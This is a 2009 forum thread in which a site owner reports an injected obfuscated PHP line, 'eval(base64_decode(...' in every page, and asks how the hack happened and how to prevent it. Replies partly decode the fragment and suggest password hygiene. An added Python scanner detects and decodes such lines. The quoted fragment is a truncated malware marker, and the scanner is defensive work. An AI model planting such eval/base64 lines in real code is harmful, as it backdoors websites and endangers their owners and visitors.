10-20-2009, 07:51 AM | #1
john_zakaria
php decode hacked my site

I found a problem on my site, and when I compared the files on the server with my local files I found that every page (*.js or *.php) has this line in it:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC
or a javascript line


So I knew that my site had been hacked.
So:
1 - I want to know how to prevent anyone from hacking my site?
On every text field or textarea, when posting or getting it, I applied htmlspecialcharacter($_POST['name'])

Is this true? And can it help me?

2 - How did someone hack my site?

3 - How can I know what this code means?

Thanks in advance and have a nice day
10-20-2009, 09:03 AM | #2
abduraooft
Are you using any open source engine anywhere under your FTP account?
10-20-2009, 09:03 AM | #3
Phil Jackson
Post the rest of the line "(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC ".
The above translates to "if(function_exists(".
Last edited by Phil Jackson; 10-20-2009 at 04:08 PM..
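Added example, not posted by anyone in this thread: a Python scanner that finds the `eval(base64_decode('` line described in post #1 in *.php and *.js files and decodes its payload to text without executing it, tolerating a truncated string like the fragment quoted above. The function names and the sample text are assumptions made for this example.

```python
import base64
import re
from pathlib import Path

# The injected pattern quoted in post #1: eval(base64_decode('...
# The closing quote is not required, so a truncated paste still matches.
INJECTION = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def decode_fragment(b64: str) -> str:
    """Decode a possibly truncated base64 string to text; nothing is executed."""
    b64 = b64.rstrip("=")
    if len(b64) % 4 == 1:         # a lone trailing character holds only 6 bits
        b64 = b64[:-1]
    b64 += "=" * (-len(b64) % 4)  # restore the padding lost to truncation
    return base64.b64decode(b64).decode("latin-1")


def find_injections(name: str, text: str) -> list:
    """Return (file name, line number, decoded payload) for each injected line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for match in INJECTION.finditer(line):
            hits.append((name, lineno, decode_fragment(match.group(1))))
    return hits


def scan_tree(root: str) -> list:
    """Scan every *.php and *.js file under root, the file types named in post #1.

    Only the PHP pattern is matched; the JavaScript variant is not shown on the page.
    """
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in (".php", ".js"):
            hits += find_injections(str(path), path.read_text(encoding="latin-1"))
    return hits


# Constructed sample: line 1 is the truncated fragment quoted in post #1.
SAMPLE = (
    "<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC\n"
    "<?php echo 'hello'; ?>\n"
)

if __name__ == "__main__":
    for name, lineno, decoded in find_injections("index.php", SAMPLE):
        print(f"{name}:{lineno}: {decoded!r}")
```

Run `scan_tree()` against a downloaded copy of the site rather than the live server, and compare the hits with the clean local files.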
10-20-2009, 04:02 PM | #4
Fumigator
Is your password a regular word that can be found in a dictionary? You really must use numbers and characters in your password.